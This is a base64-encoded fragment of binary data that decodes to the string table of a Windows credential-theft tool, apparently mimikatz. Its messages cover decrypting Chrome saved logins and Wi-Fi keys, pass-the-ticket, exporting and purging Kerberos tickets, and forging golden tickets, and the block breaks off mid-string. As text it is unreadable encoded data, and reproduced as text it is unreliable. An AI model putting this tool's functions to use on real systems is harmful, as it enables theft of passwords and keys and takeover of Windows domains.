HIAbwBtAGUAIAA7ACAAcwBxAGwAaQB0AGUAMwBfAG8AcABlAG4AXwB2ADIAOgAgACUAUwAgACgAJQBTACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAGMAaAByAG8AbQBlACAAOwAgAHMAcQBsAGkAdABlADMAXwBpAG4AaQB0AGkAYQBsAGkAegBlADoAIAAwAHgAJQAwADgAeAAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBjAGgAcgBvAG0AZQAgADsAIABJAG4AcAB1AHQAIAAnAEwAbwBnAGkAbgAgAEQAYQB0AGEAJwAgAGYAaQBsAGUAIABuAGUAZQBkAGUAZAAgACgALwBpAG4AOgAiACUAJQBsAG8AYwBhAGwAYQBwAHAAZABhAHQAYQAlACUAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAVQBzAGUAcgAgAEQAYQB0AGEAXABEAGUAZgBhAHUAbAB0AFwATABvAGcAaQBuACAARABhAHQAYQAiACkACgAAAHNlbGVjdCBjb3VudCgqKSBmcm9tIHNxbGl0ZV9tYXN0ZXIgd2hlcmUgdHlwZT0ndGFibGUnIGFuZCBuYW1lPT8AAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBjAGgAcgBvAG0AZQBfAGkAcwBUAGEAYgBsAGUARQB4AGkAcwB0ACAAOwAgAHMAcQBsAGkAdABlADMAXwBzAHQAZQBwADoAIAAlAFMACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAGMAaAByAG8AbQBlAF8AaQBzAFQAYQBiAGwAZQBFAHgAaQBzAHQAIAA7ACAAcwBxAGwAaQB0AGUAMwBfAGIAaQBuAGQAXwB0AGUAeAB0ADoAIAAlAFMACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AYwBoAHIAbwBtAGUAXwBpAHMAVABhAGIAbABlAEUAeABpAHMAdAAgADsAIABzAHEAbABpAHQAZQAzAF8AcAByAGUAcABhAHIAZQBfAHYAMgA6ACAAJQBTAAoAAAAAAAAAAAAAAAAAAAAAAEQAZQBjAHIAeQBwAHQAaQBuAGcAIABMAGUAZwBhAGMAeQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAKABzACkAOgAKAAAAAAAAAEQAZQBjAHIAeQBwAHQAaQBuAGcAIABDAHIAZQBkAGUAbgB0AGkAYQBsADoACgAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBjAHIAZQBkACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHIAZQBhAGQARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAGMAcgBlAGQAIAA7ACAASQBuAHAAdQB0ACAAQwBSAEUARAAgAGYAaQBsAGUAIABuAGUAZQBkAGUAZAAgACgALwBpAG4AOgBmAGkAbABlACkACgAAAAAAAAAAAHAAbwBsAGkAYwB5AAAAAABEAGUAYwByAHkAcAB0AGkAbgBnACAAUABvAGwAaQBjAHkAIABLAGUAeQBzADoACgAAAAAAAAAAACAAIABBAEUAUwAxADIAOAAgAGsAZQB5ADoAIAAAAAAAIAAgAEEARQBTADIANQA2ACAAawBlAHkAOgAgAAAAAAAgACAAPgAgAEEAdAB0AHIAaQBiAHUAdABlACAAJQB1ACAAOgAgAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwB2AGEAdQBsAHQAIAA7ACAAQwByAHkAcAB0AEQAZQBjAHIAeQBwAHQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AdgBhAHUAbAB0ACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHIAZQBhAGQARABhAHQAYQAgACgAcABvAGwAaQBjAHkAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AdgBhAHUAbAB0ACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHIAZQBhAGQARABhAHQAYQAgACgAYwByAGUAZAApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AdgBhAHUAbAB0ACAAOwAgAEkAbgBwAHUAdAAgAEMAcgBlAGQAIABmAGkAbABlACAAbgBlAGUAZABlAGQAIAAoAC8AYwByAGUAZAA6AGYAaQBsAGUAKQAKAAAARABlAGMAcgB5AHAAdABpAG4AZwAgAEEAVABfAFMASQBHAE4AQQBUAFUAUgBFACAARQB4AHAAbwByAHQAIABmAGwAYQBnAHMAOgAKAAAAAABIajFkaVE2a3BVeDdWQzRtAAAAAAAAAAAAAAAAAAAAAEQAZQBjAHIAeQBwAHQAaQBuAGcAIABBAFQAXwBTAEkARwBOAEEAVABVAFIARQAgAFAAcgBpAHYAYQB0AGUAIABLAGUAeQA6AAoAAAAAAAAAcgBhAHcAXwBzAGkAZwBuAGEAdAB1AHIAZQAAAAAAAABEAGUAYwByAHkAcAB0AGkAbgBnACAAQQBUAF8ARQBYAEMASABBAE4ARwBFACAARQB4AHAAbwByAHQAIABmAGwAYQBnAHMAOgAKAAAAAAAAAEQAZQBjAHIAeQBwAHQAaQBuAGcAIABBAFQAXwBFAFgAQwBIAEEATgBHAEUAIABQAHIAaQB2AGEAdABlACAASwBlAHkAOgAKAAAAAAAAAAAAcgBhAHcAXwBlAHgAYwBoAGEAbgBnAGUAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAGsAZQB5AHMAXwBjAGEAcABpACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHIAZQBhAGQARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AawBlAHkAcwBfAGMAYQBwAGkAIAA7ACAASQBuAHAAdQB0ACAAQwBBAFAASQAgAHAAcgBpAHYAYQB0AGUAIABrAGUAeQAgAGYAaQBsAGUAIABuAGUAZQBkAGUAZAAgACgALwBpAG4AOgBmAGkAbABlA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AAAUgBlAHQAcgBpAGUAdgBlACAAYwB1AHIAcgBlAG4AdAAgAFQARwBUAAAAAAAAAAAAcAB1AHIAZwBlAAAAAAAAAFAAdQByAGcAZQAgAHQAaQBjAGsAZQB0ACgAcwApAAAAZwBvAGwAZABlAG4AAAAAAFcAaQBsAGwAeQAgAFcAbwBuAGsAYQAgAGYAYQBjAHQAbwByAHkAAABIAGEAcwBoACAAcABhAHMAcwB3AG8AcgBkACAAdABvACAAawBlAHkAcwAAAAAAAABwAHQAYwAAAFAAYQBzAHMALQB0AGgAZQAtAGMAYwBhAGMAaABlACAAWwBOAFQANgBdAAAAAAAAAGMAbABpAHMAdAAAAAAAAABMAGkAcwB0ACAAdABpAGMAawBlAHQAcwAgAGkAbgAgAE0ASQBUAC8ASABlAGkAbQBkAGEAbABsACAAYwBjAGEAYwBoAGUAAABrAGUAcgBiAGUAcgBvAHMAAAAAAAAAAABLAGUAcgBiAGUAcgBvAHMAIABwAGEAYwBrAGEAZwBlACAAbQBvAGQAdQBsAGUAAAAqACAARABpAHIAZQBjAHQAbwByAHkAOgAgACcAJQBzACcACgAAAAAAKgAuAGsAaQByAGIAaQAAAAoAKgAgAEYAaQBsAGUAOgAgACcAJQBzACcAOgAgAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAHAAdAB0AF8AZgBpAGwAZQAgADsAIABMAHMAYQBDAGEAbABsAEsAZQByAGIAZQByAG8AcwBQAGEAYwBrAGEAZwBlACAAJQAwADgAeAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AcAB0AHQAXwBmAGkAbABlACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHIAZQBhAGQARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBwAHQAdABfAGQAYQB0AGEAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUwB1AGIAbQBpAHQAVABpAGMAawBlAHQATQBlAHMAcwBhAGcAZQAgAC8AIABQAGEAYwBrAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AcAB0AHQAXwBkAGEAdABhACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFMAdQBiAG0AaQB0AFQAaQBjAGsAZQB0AE0AZQBzAHMAYQBnAGUAIAA6ACAAJQAwADgAeAAKAAAAAAAAAFQAaQBjAGsAZQB0ACgAcwApACAAcAB1AHIAZwBlACAAZgBvAHIAIABjAHUAcgByAGUAbgB0ACAAcwBlAHMAcwBpAG8AbgAgAGkAcwAgAE8ASwAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AcAB1AHIAZwBlACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFAAdQByAGcAZQBUAGkAYwBrAGUAdABDAGEAYwBoAGUATQBlAHMAcwBhAGcAZQAgAC8AIABQAGEAYwBrAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBwAHUAcgBnAGUAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUAB1AHIAZwBlAFQAaQBjAGsAZQB0AEMAYQBjAGgAZQBNAGUAcwBzAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAASwBlAHIAYgBlAHIAbwBzACAAVABHAFQAIABvAGYAIABjAHUAcgByAGUAbgB0ACAAcwBlAHMAcwBpAG8AbgAgADoAIAAAAAAAAAAAAAAAAAAKAAoACQAqACoAIABTAGUAcwBzAGkAbwBuACAAawBlAHkAIABpAHMAIABOAFUATABMACEAIABJAHQAIABtAGUAYQBuAHMAIABhAGwAbABvAHcAdABnAHQAcwBlAHMAcwBpAG8AbgBrAGUAeQAgAGkAcwAgAG4AbwB0ACAAcwBlAHQAIAB0AG8AIAAxACAAKgAqAAoAAAAAAG4AbwAgAHQAaQBjAGsAZQB0ACAAIQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAHQAZwB0ACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFIAZQB0AHIAaQBlAHYAZQBUAGkAYwBrAGUAdABNAGUAcwBzAGEAZwBlACAALwAgAFAAYQBjAGsAYQBnAGUAIAA6ACAAJQAwADgAeAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwB0AGcAdAAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBSAGUAdAByAGkAZQB2AGUAVABpAGMAawBlAHQATQBlAHMAcwBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAGUAeABwAG8AcgB0AAAAAAAKAFsAJQAwADgAeABdACAALQAgADAAeAAlADAAOAB4ACAALQAgACUAcwAAAAAAAAAKACAAIAAgAFMAdABhAHIAdAAvAEUAbgBkAC8ATQBhAHgAUgBlAG4AZQB3ADoAIAAAAAAAAAAAACAAOwAgAAAAAAAAAAAAAAAKACAAIAAgAFMAZQByAHYAZQByACAATgBhAG0AZQAgACAAIAAgACAAIAAgADoAIAAlAHcAWgAgAEAAIAAlAHcAWgAAAAAAAAAAAAAAAAAAAAoAIAAgACAAQwBsAGkAZQBuAHQAIABOAGEAbQBlACAAIAAgACAAIAAgACAAOgAgACUAdwBaACAAQAAgACUAdwBaAAAAAAAAAAoAIAAgACAARgBsAGEAZwBzACAAJQAwADgAeAAgACAAIAAgADoAIAAAAAAAAAAAAGsAaQByAGIAaQAAAAAAAAAKACAAIAAgACoAIABTAGEAdgBlAGQAIAB0AG8AIABmAGkAbABlACAAIAAgACAAIAA6ACAAJQBzAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGwAaQBzAHQAIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AdwByAGkAdABlAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AbABpAHMAdAAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBSAGUAdAByAGkAZQB2AGUARQBuAGMAbwBkAGUAZABUAGkAYwBrAGUAdABNAGUAcwBzAGEAZwBlACAALwAgAFAAYQBjAGsAYQBnAGUAIAA6ACAAJQAwADgAeAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBsAGkAcwB0ACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFIAZQB0AHIAaQBlAHYAZQBFAG4AYwBvAGQAZQBkAFQAaQBjAGsAZQB0AE0AZQBzAHMAYQBnAGUAIAA6ACAAJQAwADgAeAAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AbABpAHMAdAAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBRAHUAZQByAHkAVABpAGMAawBlAHQAQwBhAGMAaABlAEUAeAAyAE0AZQBzAHMAYQBnAGUAIAAvACAAUABhAGMAawBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBsAGkAcwB0ACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFEAdQBlAHIAeQBUAGkAYwBrAGUAdABDAGEAYwBoAGUARQB4ADIATQBlAHMAcwBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAAAAAAB0AGsAdAAAAG4AbwBjAGEAYwBoAGUAAAB0AGEAcgBnAGUAdAAAAAAAcgBjADQAAABkAGUAcwAAAGEAZQBzADIANQA2AAAAAABhAGUAcwAxADIAOAAAAAAAQQBzAGsAaQBuAGcAIABmAG8AcgA6ACAAJQB3AFoACgAAAAAAAAAAAAAAAAAAAAAAIAAgACAAKgAgAFQAaQBjAGsAZQB0ACAARQBuAGMAcgB5AHAAdABpAG8AbgAgAFQAeQBwAGUAIAAmACAAawB2AG4AbwAgAG4AbwB0ACAAcgBlAHAAcgBlAHMAZQBuAHQAYQB0AGkAdgBlACAAYQB0ACAAcwBjAHIAZQBlAG4ACgAAAAAAAAAAAAAAAAAAAAAAIAAgACAAKgAgAE4AbwBDAGEAYwBoAGUAOgAgAGUAeABwAG8AcgB0AGUAZAAgAHQAaQBjAGsAZQB0ACAAbQBhAHkAIAB2AGEAcgB5ACAAdwBpAHQAaAAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgBzACAAYQB0ACAAcwBjAHIAZQBlAG4ACgAAAAoAIAAgACAAKgAgAFQASwBUACAAdABvACAAZgBpAGwAZQAgACAAIAAgACAAIAAgADoAIAAlAHMAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AYQBzAGsAIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AdwByAGkAdABlAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAAoAIAAgACAAKgAgAEsAaQBSAEIAaQAgAHQAbwAgAGYAaQBsAGUAIAAgACAAIAAgADoAIAAlAHMAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AYQBzAGsAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUgBlAHQAcgBpAGUAdgBlAEUAbgBjAG8AZABlAGQAVABpAGMAawBlAHQATQBlAHMAcwBhAGcAZQAgAC8AIABQAGEAYwBrAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBhAHMAawAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBSAGUAdAByAGkAZQB2AGUARQBuAGMAbwBkAGUAZABUAGkAYwBrAGUAdABNAGUAcwBzAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AYQBzAGsAIAA7ACAAJwAlAHcAWgAnACAASwBlAHIAYgBlAHIAbwBzACAAbgBhAG0AZQAgAG4AbwB0ACAAZgBvAHUAbgBkACEACgAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBhAHMAawAgADsAIABBAHQAIABsAGUAYQBzAHQAIAAvAHQAYQByAGcAZQB0ACAAYQByAGcAdQBtAGUAbgB0ACAAaQBzACAAcgBlAHEAdQBpAHIAZQBkACAAKABlAGcAOgAgAC8AdABhAHIAZwBlAHQAOgBjAGkAZgBzAC8AcwBlAHIAdgBlAHIALgBsAGEAYgAuAGwAbwBjAGEAbAApAAoAAAAAACUAdQAtACUAMAA4AHgALQAlAHcAWgBAACUAdwBaAC0AJQB3AFoALgAlAHMAAAAAACUAMAA4AHgALQAlAHcAWgBAACUAdwBaAC0AJQB3AFoALgAlAHMAAAAlADAAOAB4AC0AbgBvAG4AYQBtAGUALgAlAHMAAAAAAHQAaQBjAGsAZQB0AC4AawBpAHIAYgBpAAAAAAAAAAAAdABpAGMAawBlAHQAAAAAAGEAZABtAGkAbgAAAAAAAAB1AHMAZQByAAAAAAAAAAAAawByAGIAdABnAHQAAAAAAHMAZQByAHYAaQBjAGUAAABpAGQAAAAAAHIAbwBkAGMAAAAAAAAAAABnAHIAbwB1AHAAcwAAAAAAcwBpAGQAcwAAAAAAAAAAAGMAbABhAGkAbQBzAAAAAAAwAAAAAAAAAHMAdABhAHIAdABvAGYAZgBzAGUAdAAAADUAMgA1ADYAMAAwADAAAABlAG4AZABpAG4AAAAAAAAAcgBlAG4AZQB3AG0AYQB4AAAAAAAAAAAAAAAAAAAAAABVAHMAZQByACAAIAAgACAAIAAgADoAIAAlAHMACgBEAG8AbQBhAGkAbgAgACAAIAAgADoAIAAlAHMAIAAoACUAcwApAAoAUwBJAEQAIAAgACAAIAAgACAAIAA6ACAAJQBzAAoAVQBzAGUAcgAgAEkAZAAgACAAIAA6ACAAJQB1AAoAAAAAAAAARwByAG8AdQBwAHMAIABJAGQAIAA6ACAAKgAAAAAAAAAlAHUAIAAAAAoARQB4AHQAcgBhACAAUwBJAEQAcwA6ACAAAAAAAAAACgBDAGwAYQBpAG0AcwAgACAAIAAgADoACgAAAAAAAAAKAFMAZQByAHYAaQBjAGUASwBlAHkAOgAgAAAAAAAAACAALQAgACUAcwAKAAAAAABTAGUAcgB2AGkAYwBlACAAIAAgADoAIAAlAHMACgAAAFQAYQByAGcAZQB0ACAAIAAgACAAOgAgACUAcwAKAAAATABpAGYAZQB0AGkAbQBlACAAIAA6ACAAAAAAAAAAAAAqACoAIABQAGEAcwBzACAAVABoAGUAIABUAGkAYwBrAGUAdAAgACoAKgAAAAAAAAAtAD4AIABUAGkAYwBrAGUAdAAgADoAIAAlAHMACgAKAAAAAAAAAAAAAAAAAAAAAAAKAEcAbwBsAGQAZQBuACAAdABpAGMAawBlAHQAIABmAG8AcgAgACcAJQBzACAAQAAgACUAcwAnACAAcwB1AGMAYwBlAHMAcwBmAHUAbABsAHkAIABzAHUAYgBtAGkAdAB0AGUAZAAgAGYAbwByACAAYwB1AHIAcgBlAG4AdAAgAHMAZQBzAHMAaQBvAG4ACgAAAAAAAAAAAAoARgBpAG4AYQBsACAAVABpAGMAawBlAHQAIABTAGEAdgBlAGQAIAB0AG8AIABmAGkAbABlACAAIQAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAACgBrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwB3AHIAaQB0AGUARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABCAGUAcgBBAHAAcABfAEsAcgBiAEMAcgBlAGQAIABlAHIAcgBvAHIACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAASwByAGIAdABnAHQAIABrAGUAeQAgAHMAaQB6AGUAIABsAGUAbgBnAHQAaAAgAG0AdQBzAHQAIABiAGUAIAAlAHUAIAAoACUAdQAgAGIAeQB0AGUAcwApACAAZgBvAHIAIAAlAHMACgAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABVAG4AYQBiAGwAZQAgAHQAbwAgAGwAbwBjAGEAdABlACAAQwByAHkAcAB0AG8AUwB5AHMAdABlAG0AIABmAG8AcgAgAEUAVABZAFAARQAgACUAdQAgACgAZQByAHIAbwByACAAMAB4ACUAMAA4AHgAKQAgAC0AIABBAEUAUwAgAG8AbgBsAHkAIABhAHYAYQBpAGwAYQBiAGwAZQAgAG8AbgAgAE4AVAA2AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABNAGkAcwBzAGkAbgBnACAAawByAGIAdABnAHQAIABrAGUAeQAgAGEAcgBnAHUAbQBlAG4AdAAgACgALwByAGMANAAgAG8AcgAgAC8AYQBlAHMAMQAyADgAIABvAHIAIAAvAGEAZQBzADIANQA2ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABTAEkARAAgAHMAZQBlAG0AcwAgAGkAbgB2AGEAbABpAGQAIAAtACAAQwBvAG4AdgBlAHIAdABTAHQAcgBpAG4AZwBTAGkAZABUAG8AUwBpAGQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGcAbwBsAGQAZQBuACAAOwAgAE0AaQBzAHMAaQBuAGcAIABTAEkARAAgAGEAcg